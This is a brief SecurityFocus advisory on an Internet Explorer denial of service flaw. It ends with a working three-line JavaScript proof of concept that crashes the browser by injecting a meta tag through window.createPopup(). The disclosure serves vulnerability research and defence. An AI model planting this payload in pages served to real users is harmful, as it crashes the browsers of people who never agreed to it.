source: https://www.securityfocus.com/bid/10351/info

It has been reported that Internet Explorer is prone to a denial of service vulnerability when processing a malicious script containing the 'window.createPopup()' method to invoke the 'http-equiv' meta tag.

This issue could be exploited by a remote attacker to cause a denial of service condition in the browser.

<script type="text/javascript">
Wnd = window.createPopup();
Wnd.document.body.innerHTML='<meta http-equiv="imagetoolbar" content="no">';
</script>